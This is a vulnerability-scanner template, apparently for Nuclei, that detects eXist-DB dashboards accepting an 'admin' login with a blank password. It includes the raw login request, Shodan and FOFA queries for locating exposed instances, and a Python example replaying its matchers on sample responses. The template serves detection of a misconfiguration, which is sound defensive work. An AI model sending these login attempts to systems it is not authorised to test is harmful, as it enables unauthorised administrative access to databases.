Vulnerability description
Detects eXist DB dashboard login endpoint access. eXist DB is a document-oriented database that allows you to store and query XML data. The dashboard is a web interface that allows you to manage the database and view the data.
id: exist-db-dashboard-access

info:
  name: eXist-DB Dashboard Access
  author: ritikchaddha
  severity: high
  description: Detects eXist DB dashboard login endpoint access. eXist DB is a document-oriented database that allows you to store and query XML data. The dashboard is a web interface that allows you to manage the database and view the data.
  reference:
    - https://exist-db.org/
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"eXist db"
    fofa-query: title="eXist db"
  tags: misconfig,exist-db,dashboard,login,exposure

variables:
  username: "admin"

http:
  - raw:
      - |
        POST /exist/apps/dashboard/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'user"\s*:\s*"admin"'
          - 'dba"\s*:\s*"true"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fddba794b09ce14b35e7470b22966cd09e888b75175b83bfa08de63754ab238f022100916b037ae20c98038517e77b4abd1c9576183628c556590cdcc80f9df34e7e1f:922c64590222798bb761d5b6d8e72950
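To see exactly what the template flags, here is an added Python example (not part of the template or of the Nuclei project) that replicates its three matchers offline over constructed sample responses; the response bodies are assumed shapes for illustration, not captured eXist-DB output.

```python
import re

# Matchers transcribed from the template above. With matchers-condition: and,
# every matcher must hit; the two regexes are themselves AND-combined.
USER_ADMIN_RE = re.compile(r'user"\s*:\s*"admin"')
DBA_TRUE_RE = re.compile(r'dba"\s*:\s*"true"')
EXPECTED_CONTENT_TYPE = "application/xml"   # word matcher on the Content-Type header
EXPECTED_STATUS = 200                       # status matcher


def template_matches(status: int, content_type: str, body: str) -> bool:
    """Return True when a login response would trigger the template.

    A hit means the dashboard answered the blank-password login for 'admin'
    with a body that names the user 'admin' and marks it as a dba.
    """
    regex_ok = bool(USER_ADMIN_RE.search(body)) and bool(DBA_TRUE_RE.search(body))
    content_type_ok = EXPECTED_CONTENT_TYPE in content_type
    status_ok = status == EXPECTED_STATUS
    return regex_ok and content_type_ok and status_ok


# Constructed sample responses (status, Content-Type, body); assumed, not real output.
SAMPLES = {
    "blank_password_accepted": (200, "application/xml; charset=UTF-8",
                                '{"user": "admin", "dba": "true"}'),
    "login_rejected":          (200, "application/xml",
                                '{"fail": "Wrong user or password"}'),
    "non_dba_user":            (200, "application/xml",
                                '{"user":"guest","dba":"false"}'),
    "wrong_content_type":      (200, "text/html",
                                '{"user":"admin","dba":"true"}'),
    "unauthorized":            (401, "application/xml",
                                '{"user":"admin","dba":"true"}'),
}


def evaluate_samples() -> dict:
    """Run every constructed response through the matcher logic."""
    return {name: template_matches(*resp) for name, resp in SAMPLES.items()}


if __name__ == "__main__":
    for name, hit in evaluate_samples().items():
        print(f"{name:24s} -> {'FLAGGED' if hit else 'clean'}")
```

Only the first sample is flagged; a 200 with an XML content type on its own (the rejected-login case) is not enough, which is what keeps the template from firing on a hardened instance.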